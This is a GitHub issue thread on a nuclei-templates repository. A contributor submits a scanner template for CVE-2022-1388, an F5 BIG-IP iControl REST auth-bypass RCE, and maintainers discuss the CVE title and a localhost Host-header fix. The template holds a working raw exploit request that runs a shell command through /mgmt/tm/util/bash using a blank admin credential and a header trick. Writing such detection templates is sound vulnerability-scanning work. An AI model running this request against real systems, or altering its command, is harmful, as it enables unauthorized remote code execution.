[nuclei-template] CVE-2022-1388
rhbb opened this issue · comments
CVE-2022-1388
id: bigip-icontrol-rest-rce
info:
name: F5 BIG-IP iControl REST Panel RCE
author: rhbb
severity: critical
tags: CVE-2022-1388,bigip,f5
requests:
- raw:
- |
POST /mgmt/tm/util/bash HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive, X-F5-Auth-Token
Authorization: Basic YWRtaW46
X-F5-Auth-Token: 0
Content-Length: 32
{"command":"run","utilCmdArgs":"-c whoami"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "-c whoami"
part: body
extractors:
- type: regex # type of the extractor
part: body
name: whoami
regex:
- "lt(.*?)}" # JQ like syntax for extraction
Hello @rhbb, thank you so much for sharing this template with the community and contributing to this project 🚀
Could you please provide any references to this CVE?
@rhbb It's CVE-2022-1388.
Thanks, I wrote the wrong title.
您好@rhbb,非常感谢您与社区分享此模板并为此项目做出贡献🚀
您能否提供对此 CVE 的任何参考?
Sorry, I wrote the wrong title. The real CVE number is CVE-2022-1388
@rhbb, thanks for confirming, there is an existing template for CVE-2022-1388.
https://github.com/projectdiscovery/nuclei-templates/blob/f9787a75fdda1e8fce10a33c46a22a0505f0c9cc/cves/2022/CVE-2022-1388.yaml
@ehsandeep can we update the template with localhost as Host ?
Source : https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
@ehsandeep can we update the template with localhost as Host ?
Source : https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Yeah, we had to change hostname to localhost to get positives on our version of the software.
@pizza-power @rhbb @DhiyaneshGeek localhost has been added in latest release - https://github.com/projectdiscovery/nuclei-templates/releases/tag/v9.0.1
@pizza-power @rhbb @DhiyaneshGeek
localhosthas been added in latest release - https://github.com/projectdiscovery/nuclei-templates/releases/tag/v9.0.1
Cool, thanks. Was gonna submit it myself, but saw that. Appreciate the work!